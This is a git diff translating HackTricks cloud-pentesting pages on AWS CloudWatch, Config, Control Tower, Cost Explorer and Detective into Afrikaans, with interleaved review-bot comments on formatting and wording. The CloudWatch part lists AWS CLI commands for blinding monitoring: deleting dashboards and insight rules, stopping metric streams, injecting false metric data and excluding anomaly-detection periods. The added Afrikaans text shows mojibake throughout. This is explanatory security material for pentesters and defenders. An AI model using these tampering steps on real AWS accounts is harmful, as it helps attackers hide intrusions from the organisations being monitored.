data gedurende daardie tydperk analiseer of waarsku nie. 
{{#tabs }} {{#tab name="Original Metric Anomaly Detector" }} - ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +} } ``` - {{#endtab }} -{{#tab name="Modified Metric Anomaly Detector" }} - +{{#tab name="Gewysigde Metriek Anomalie Detektor" }} ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - }, - "Configuration": { - "ExcludedTimeRanges": [ - { - "StartTime": "2023-01-01T00:00:00Z", - "EndTime": "2053-01-01T23:59:59Z" - } - ], - "Timezone": "Europe/Madrid" - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +}, +"Configuration": { +"ExcludedTimeRanges": [ +{ +"StartTime": "2023-01-01T00:00:00Z", +"EndTime": "2053-01-01T23:59:59Z" +} +], +"Timezone": "Europe/Madrid" +} } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Direct effect in the detection of unusual patterns or security threats. +**PotensiĂ«le Impak**: Direkte effek op die opsporing van ongewone patrone of sekuriteitsbedreigings. ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`** -An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities. 
- +'n Aanvaller sou in staat wees om die monitering en visualisering vermoĂ«ns van 'n organisasie te kompromitteer deur sy dashboards te skep, te wysig of te verwyder. Hierdie toestemmings kan benut word om kritieke sigbaarheid in die prestasie en gesondheid van stelsels te verwyder, dashboards te verander om verkeerde data te vertoon of kwaadwillige aktiwiteite te verberg. ```bash aws cloudwatch delete-dashboards --dashboard-names aws cloudwatch put-dashboard --dashboard-name --dashboard-body ``` - -**Potential Impact**: Loss of monitoring visibility and misleading information. +**PotensiĂ«le Impak**: Verlies van moniteringssigbaarheid en misleidende inligting. ### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`** -Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team. - +Insight-reĂ«ls word gebruik om anomalieĂ« te detecteer, prestasie te optimaliseer en hulpbronne effektief te bestuur. Deur bestaande insight-reĂ«ls te verwyder, kan 'n aanvaller kritieke moniteringsvermoĂ«ns verwyder, wat die stelsel blind laat vir prestasieprobleme en sekuriteitsbedreigings. Boonop kan 'n aanvaller insight-reĂ«ls skep of wysig om misleidende data te genereer of kwaadwillige aktiwiteite te verberg, wat lei tot onakkurate diagnosering en onvanpaste reaksies van die operasiespan. 
```bash aws cloudwatch delete-insight-rules --rule-names aws cloudwatch put-insight-rule --rule-name --rule-definition [--rule-state ] aws cloudwatch put-managed-insight-rules --managed-rules ``` - -**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures. +**PotensiĂ«le Impak**: Moeilikheid om prestasieprobleme en anomaliĂ« op te spoor en daarop te reageer, verkeerd ingeligte besluitneming en moontlik die verborge van kwaadwillige aktiwiteite of stelselfoute. ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`** -By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity. - +Deur kritieke insigreĂ«ls te deaktiveer, kan 'n aanvaller die organisasie effektief blind maak vir sleutelprestasie- en sekuriteitsmetrieks. Omgekeerd, deur misleidende reĂ«ls in te skakel of te konfigureer, kan dit moontlik wees om valse data te genereer, geraas te skep, of kwaadwillige aktiwiteit te verberg. ```bash aws cloudwatch disable-insight-rules --rule-names aws cloudwatch enable-insight-rules --rule-names ``` - -**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts. +**PotensiĂ«le Impak**: Verwarring onder die operasiespan, wat lei tot vertraagde reaksies op werklike probleme en onnodige aksies gebaseer op valse waarskuwings. 
### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`** -An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: +'n Aanvaller met die **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** toestemmings sou in staat wees om metriekdata-strome te skep en te verwyder, wat die sekuriteit, monitering en data-integriteit in gevaar stel: -- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. -- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. -- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. - -Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. +- **Skep kwaadwillige strome**: Skep metriekstrome om sensitiewe data na ongeoorloofde bestemmings te stuur. +- **Hulpbronmanipulasie**: Die skep van nuwe metriekstrome met oormatige data kan baie geraas veroorsaak, wat onakkurate waarskuwings veroorsaak en werklike probleme verdoesel. +- **Moniteringonderbreking**: Deur metriekstrome te verwyder, sou aanvallers die deurlopende vloei van moniteringsdata onderbreek. Op hierdie manier sou hul kwaadwillige aktiwiteite effektief verborge wees. +Op soortgelyke wyse, met die **`cloudwatch:PutMetricData`** toestemming, sou dit moontlik wees om data aan 'n metriekstroom toe te voeg. Dit kan lei tot 'n DoS as gevolg van die hoeveelheid onvanpaste data wat bygevoeg word, wat dit heeltemal nutteloos maak. 
```bash aws cloudwatch delete-metric-stream --name aws cloudwatch put-metric-stream --name [--include-filters ] [--exclude-filters ] --firehose-arn --role-arn --output-format aws cloudwatch put-metric-data --namespace [--metric-data ] [--metric-name ] [--timestamp ] [--unit ] [--value ] [--dimensions ] ``` - -Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance: - +Voorbeeld van die toevoeging van data wat ooreenstem met 'n 70% CPU benutting oor 'n gegewe EC2 instance: ```bash aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg" ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams. +**PotensiĂ«le Impak**: Onderbreking in die vloei van moniteringsdata, wat die opsporing van afwykings en voorvalle beĂŻnvloed, hulpbronmanipulasie en koste wat toeneem as gevolg van die skep van oortollige metriekstrome. ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`** -An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams. - +'n Aanvaller sou die vloei van die geaffekteerde metriekdata-strome beheer (elke datastroom as daar geen hulpbronbeperking is nie). Met die toestemming **`cloudwatch:StopMetricStreams`**, kan aanvallers hul kwaadwillige aktiwiteite verberg deur kritieke metriekstrome te stop. ```bash aws cloudwatch stop-metric-streams --names aws cloudwatch start-metric-streams --names ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents. 
+**PotensiĂ«le Impak**: Onderbreking in die vloei van moniteringsdata, wat die opsporing van anomalieĂ« en voorvalle beĂŻnvloed. ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`** -An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags. - +'n Aanvaller sal in staat wees om etikette by CloudWatch hulpbronne (huidiglik slegs alarms en Contributor Insights reĂ«ls) te voeg, te wysig of te verwyder. Dit kan jou organisasie se toegangbeheerbeleide op grond van etikette onderbreek. ```bash aws cloudwatch tag-resource --resource-arn --tags aws cloudwatch untag-resource --resource-arn --tag-keys ``` +**PotensiĂ«le Impak**: Ontwrichting van etiket-gebaseerde toegangbeheerbeleide. -**Potential Impact**: Disruption of tag-based access control policies. - -## References +## Verwysings - [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) - [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md index f2ab3c4c5..d0ec9a412 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md 
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md 
@@ -4,47 +4,43 @@ ## AWS Config -AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**. +AWS Config **vang hulpbron veranderinge**, so enige verandering aan 'n hulpbron wat deur Config ondersteun word, kan geregistreer word, wat **sal registreer wat verander het saam met ander nuttige metadata, alles gehou binne 'n lĂȘer bekend as 'n konfigurasie-item**, 'n CI. Hierdie diens is **streekspesifiek**. -A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. +'n Konfigurasie-item of **CI** soos dit bekend staan, is 'n sleutelkomponent van AWS Config. Dit bestaan uit 'n JSON-lĂȘer wat **die konfigurasie-inligting, verhouding-inligting en ander metadata as 'n punt-in-tyd snapshot van 'n ondersteunde hulpbron hou**. Alle inligting wat AWS Config vir 'n hulpbron kan registreer, word binne die CI vasgevang. 'n CI word **elke keer** geskep wanneer 'n ondersteunde hulpbron 'n verandering aan sy konfigurasie maak. Benewens die registrasie van die besonderhede van die betrokke hulpbron, sal AWS Config ook CIs vir enige direk verwante hulpbronne registreer om te verseker dat die verandering nie daardie hulpbronne ook beĂŻnvloed het nie. 
-- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. +- **Metadata**: Bevat besonderhede oor die konfigurasie-item self. 'n Weergawe-ID en 'n konfigurasie-ID, wat die CI uniek identifiseer. Ander inligting kan 'n MD5Hash insluit wat jou toelaat om ander CIs wat reeds teen dieselfde hulpbron geregistreer is, te vergelyk. +- **Attributes**: Dit hou algemene **attribuutinligting teen die werklike hulpbron**. 
Binne hierdie afdeling het ons ook 'n unieke hulpbron-ID, en enige sleutelwaarde-tags wat aan die hulpbron geassosieer is. Die hulpbron tipe word ook gelys. Byvoorbeeld, as dit 'n CI vir 'n EC2-instantie was, kan die hulpbron tipe wat gelys word die netwerkinterfaan, of die elastiese IP-adres vir daardie EC2-instantie wees. +- **Relationships**: Dit hou inligting vir enige gekonnekteerde **verhouding wat die hulpbron mag hĂȘ**. So binne hierdie afdeling, sal dit 'n duidelike beskrywing van enige verhouding met ander hulpbronne wat hierdie hulpbron gehad het, toon. Byvoorbeeld, as die CI vir 'n EC2-instantie was, kan die verhouding afdeling die verbinding met 'n VPC saam met die subnet wat die EC2-instantie woon, toon. +- **Current configuration:** Dit sal dieselfde inligting vertoon wat gegenereer sou word as jy 'n beskrywing of lys API-oproep deur die AWS CLI sou uitvoer. AWS Config gebruik dieselfde API-oproepe om dieselfde inligting te verkry. +- **Related events**: Dit verwys na AWS CloudTrail. Dit sal die **AWS CloudTrail gebeurtenis-ID wat verband hou met die verandering wat die skepping van hierdie CI geaktiveer het** vertoon. Daar word 'n nuwe CI gemaak vir elke verandering wat teen 'n hulpbron gemaak word. As gevolg hiervan, sal verskillende CloudTrail gebeurtenis-ID's geskep word. -**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. +**Configuration History**: Dit is moontlik om die konfigurasiegeskiedenis van hulpbronne te verkry danksy die konfigurasie-items. 'n Konfigurasiegeskiedenis word elke 6 uur gelewer en bevat alle CI's vir 'n spesifieke hulpbron tipe. -**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. 
+**Configuration Streams**: Konfigurasie-items word na 'n SNS-onderwerp gestuur om analise van die data moontlik te maak. -**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. +**Configuration Snapshots**: Konfigurasie-items word gebruik om 'n punt-in-tyd snapshot van alle ondersteunde hulpbronne te skep. -**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. +**S3 word gebruik om** die Konfigurasiegeskiedenis lĂȘers en enige Konfigurasie-snapshots van jou data binne 'n enkele emmer te stoor, wat binne die Konfigurasie-opnemer gedefinieer word. As jy verskeie AWS-rekeninge het, wil jy dalk jou konfigurasiegeskiedenis lĂȘers in dieselfde S3-emmer vir jou primĂȘre rekening saamvoeg. Jy sal egter skrywe toegang vir hierdie diens beginsel, config.amazonaws.com, en jou sekondĂȘre rekeninge met skrywe toegang tot die S3-emmer in jou primĂȘre rekening moet toeken. 
### Functioning -- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config -- Stores everything in S3 bucket -- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings -- Lambda feeds back to Config -- If rule has been broken, Config fires up an SNS +- Wanneer jy veranderinge maak, byvoorbeeld aan 'n sekuriteitsgroep of emmer toegangbeheerlys —> laat dit af as 'n gebeurtenis wat deur AWS Config opgetel word +- Stoor alles in S3-emmer +- Afhangende van die opstelling, sodra iets verander, kan dit 'n lambda-funksie aktiveer OF 'n lambda-funksie skeduleer om periodiek deur die AWS Config-instellings te kyk +- Lambda voer terug na Config +- As 'n reĂ«l oortree is, aktiveer Config 'n SNS ![](<../../../../images/image (126).png>) ### Config Rules -Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ -AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. 
+Config-reĂ«ls is 'n uitstekende manier om jou te help **om spesifieke nakomingskontroles** **en beheer oor jou hulpbronne af te dwing**, en laat jou toe om 'n ideale ontplooiingsspesifikasie vir elkeen van jou hulpbron tipes aan te neem. Elke reĂ«l **is in wese 'n lambda-funksie** wat, wanneer dit opgeroep word, die hulpbron evalueer en 'n paar eenvoudige logika uitvoer om die nakomingsresultaat met die reĂ«l te bepaal. **Elke keer as 'n verandering gemaak word** aan een van jou ondersteunde hulpbronne, **sal AWS Config die nakoming teen enige konfigurasie reĂ«ls wat jy in plek het, nagaan**.\ +AWS het 'n aantal **voorgedefinieerde reĂ«ls** wat onder die sekuriteitsdak val en gereed is om te gebruik. Byvoorbeeld, Rds-storage-encrypted. Dit kontroleer of stoorversleuteling geaktiveer is deur jou RDS-databasisinstansies. Encrypted-volumes. Dit kontroleer of enige EBS-volumes wat 'n aangehegte toestand het, versleuteld is. -- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -- **Custom rules**: You can create your own rules to check specific customconfigurations. +- **AWS Managed rules**: Stel van voorgedefinieerde reĂ«ls wat baie beste praktyke dek, so dit is altyd die moeite werd om hierdie reĂ«ls eers te blaai voordat jy jou eie opstel, aangesien daar 'n kans is dat die reĂ«l dalk reeds bestaan. +- **Custom rules**: Jy kan jou eie reĂ«ls skep om spesifieke pasgemaakte konfigurasies na te gaan. -Limit of 50 config rules per region before you need to contact AWS for an increase.\ -Non compliant results are NOT deleted. +Beperking van 50 konfigurasie reĂ«ls per streek voordat jy AWS moet kontak vir 'n verhoging.\ +Nie-nakomende resultate word NIE verwyder nie. {{#include ../../../../banners/hacktricks-training.md}} - - - - 
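Review bot: in the CloudWatch `DeleteAnomalyDetector`/`PutAnomalyDetector` hunk, both JSON examples lose all of their indentation: every `+` line inside the two ```json blocks now starts at column 0 (`+"SingleMetricAnomalyDetector": {`, `+"Dimensions": [`, `+"ExcludedTimeRanges": [`), so the nesting that makes the `ExcludedTimeRanges` example readable is gone; only the tab title needed translating, so restore the two-space indentation shown on the removed lines. Related to that block: the first tab keeps its English title (`{{#tab name="Original Metric Anomaly Detector" }}` is untouched) while the second becomes `{{#tab name="Gewysigde Metriek Anomalie Detektor" }}`; translate both or neither. Please also verify the committed file is UTF-8 before merging: the added Afrikaans text shows `PotensiĂ«le`, `anomalieĂ«`, `beĂŻnvloed` where `Potensiële`, `anomalieë`, `beïnvloed` are expected, which is what UTF-8 bytes look like when decoded with a single-byte code page, and the same pattern recurs in every file of this patch. Minor: `ongebruikelijke` and `verwarr` are the Dutch form and a misspelling (`ongebruiklike`, `verwar`), and the blank lines that separated prose from the ```bash fences are dropped throughout the hunk (the `- ` lines before and after each fence); harmless for CommonMark, but the rest of the book keeps them.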
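Review bot: in the aws-config-enum.md hunk (`@@ -4,47 +4,43 @@`), the sentence on when a CI is created shifts meaning: the original says a CI is created every time a supported resource has a change made to its configuration, but `wanneer 'n ondersteunde hulpbron 'n verandering aan sy konfigurasie maak` reads as the resource making the change itself; `wanneer die konfigurasie van 'n ondersteunde hulpbron verander word` keeps the passive sense, which matters because Config records changes made by anyone, including an attacker. Two further points in the added bullets: `netwerkinterfaan` in the Attributes bullet looks like a typo for `netwerkinterface`, and the Functioning list keeps the literal `—>` arrow from the English (`+- Wanneer jy veranderinge maak ... —> laat dit af as 'n gebeurtenis`), where `word dit as 'n gebeurtenis afgevuur wat deur AWS Config opgetel word` would read naturally. The headings `## AWS Config`, `### Functioning` and `### Config Rules` stay in English while the body is translated; decide whether headings are translated in this patch and apply that consistently.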
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md index 9fab39fb8..0e6f02e09 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md 
@@ -5,33 +5,31 @@ ## Control Tower > [!NOTE] -> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them. +> In samevatting is Control Tower 'n diens wat dit moontlik maak om beleid vir al jou rekeninge binne jou organisasie te definieer. So in plaas daarvan om elkeen van hulle te bestuur, kan jy beleid vanaf Control Tower stel wat op hulle toegepas sal word. -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. +AWS Control Tower is 'n **diens wat deur Amazon Web Services (AWS) verskaf word** wat organisasies in staat stel om 'n veilige, nakomings- en multi-rekeningomgewing in AWS op te stel en te bestuur. -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. +AWS Control Tower bied 'n **vooraf gedefinieerde stel van beste-praktyk bloudrukke** wat aangepas kan word om aan spesifieke **organisatoriese vereistes** te voldoen. Hierdie bloudrukke sluit vooraf-gekonfigureerde AWS-dienste en -kenmerke in, soos AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, en AWS Service Catalog. -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. 
+Met AWS Control Tower kan administrateurs vinnig 'n **multi-rekeningomgewing opstel wat aan organisatoriese vereistes voldoen**, soos **veiligheid** en nakoming. Die diens bied 'n sentrale dashboard om rekeninge en hulpbronne te besigtig en te bestuur, en dit outomatiseer ook die voorsiening van rekeninge, dienste en beleid. -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. +Boonop bied AWS Control Tower veiligheidsrails, wat 'n stel van vooraf-gekonfigureerde beleid is wat verseker dat die omgewing nakom aan organisatoriese vereistes. Hierdie beleid kan aangepas word om aan spesifieke behoeftes te voldoen. -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. +Algeheel vereenvoudig AWS Control Tower die proses om 'n veilige, nakomings- en multi-rekeningomgewing in AWS op te stel en te bestuur, wat dit vir organisasies makliker maak om op hul kernbesigheidsdoelwitte te fokus. ### Enumeration -For enumerating controltower controls, you first need to **have enumerated the org**: +Vir die opsporing van controltower kontroles, moet jy eers **die org opgespoor het**: {{#ref}} ../aws-organizations-enum.md {{#endref}} - ```bash # Get controls applied in an account aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ ``` - > [!WARNING] -> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts +> Control Tower kan ook **Account factory** gebruik om **CloudFormation templates** in **rekeninge uit te voer en dienste** (privesc, post-exploitation...) 
in daardie rekeninge te laat loop ### Post Exploitation & Persistence @@ -40,7 +38,3 @@ aws controltower list-enabled-controls --target-identifier arn:aws:organizations {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md index 2f967331b..4a5e8035d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -2,18 +2,14 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Cost Explorer and Anomaly detection +## Cost Explorer en Anomalie-detectie -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. +Dit stel jou in staat om te kyk **hoe jy geld spandeer op AWS-dienste** en help jou **om anomalieĂ« te detecteer**.\ +Boonop kan jy 'n anomalie-detectie konfigureer sodat AWS jou waarsku wanneer 'n **anomalie in koste gevind word**. -### Budgets +### Begrotings -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). +Begrotings help om **koste en gebruik te bestuur**. Jy kan **waarskuwings ontvang wanneer 'n drempel bereik word**.\ +Ook kan dit gebruik word vir nie-koste verwante monitering soos die gebruik van 'n diens (hoeveel GB word in 'n spesifieke S3-bucket gebruik?). {{#include ../../../../banners/hacktricks-training.md}} - - - - 
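Review bot: in the aws-control-tower-enum.md hunk (`@@ -5,33 +5,31 @@`), the translated warning moves the bold spans off the terms that matter: `**CloudFormation templates** in **rekeninge uit te voer en dienste** (privesc, post-exploitation...) in daardie rekeninge te laat loop` bolds "accounts execute and services" while the action is unbolded; suggest `om **CloudFormation-templates** in **rekeninge uit te voer en dienste te laat loop** (privesc, post-exploitation...)`. In the Enumeration section, "enumerate" is rendered as `opsporing`/`opgespoor het` (to trace or detect), which loses the pentesting sense; `enumerasie`/`geënumereer het` keeps it. `veiligheidsrails` for "guardrails" is a coinage that readers will not find in the console; keeping the AWS term `guardrails` is clearer, and `In samevatting` should be `Samevattend`. The headings `### Enumeration` and `### Post Exploitation & Persistence` are left in English while the next file translates `### Budgets`; apply one rule across the patch.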
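Review bot: in the aws-cost-explorer-enum.md hunk (`@@ -2,18 +2,14 @@`), `Anomalie-detectie` in the heading and `te detecteer` in the body are the Dutch forms; the CloudWatch file in this same patch already uses `opsporing` (`Direkte effek op die opsporing van ongewone patrone`), so `Anomalie-opsporing` / `op te spoor` keeps the terminology consistent. Likewise `S3-bucket` here versus `S3-emmer` in aws-config-enum.md (`binne 'n enkele emmer te stoor`); pick one rendering for S3 buckets throughout.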
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md index 9d1a40eba..401aa18cb 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md 
@@ -4,9 +4,9 @@ ## Detective -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. +**Amazon Detective** stroomlyn die sekuriteitsondersoekproses, wat dit meer doeltreffend maak om **te analiseer, ondersoek te doen, en die oorsaak** van sekuriteitskwessies of ongewone aktiwiteite te identifiseer. Dit outomatiseer die insameling van logdata van AWS-hulpbronne en gebruik **masjienleer, statistiese analise, en grafteorie** om 'n onderling verbonde datastel te bou. Hierdie opstelling verbeter die spoed en doeltreffendheid van sekuriteitsondersoeke aansienlik. -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. +Die diens vergemaklik diepgaande verkenning van sekuriteitsvoorvalle, wat sekuriteitspanne in staat stel om vinnig die onderliggende oorsake van kwessies te verstaan en aan te spreek. Amazon Detective analiseer groot hoeveelhede data van bronne soos VPC Flow Logs, AWS CloudTrail, en Amazon GuardDuty. 
Dit genereer outomaties 'n **omvattende, interaktiewe oorsig van hulpbronne, gebruikers, en hul interaksies oor tyd**. Hierdie geĂŻntegreerde perspektief bied alle nodige besonderhede en konteks op een plek, wat spanne in staat stel om die redes agter sekuriteitsbevindinge te onderskei, relevante historiese aktiwiteite te ondersoek, en vinnig die oorsaak te bepaal. ## References @@ -14,7 +14,3 @@ The service eases in-depth exploration of security incidents, allowing security - [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index 0369f075c..d6eb58fb4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md 
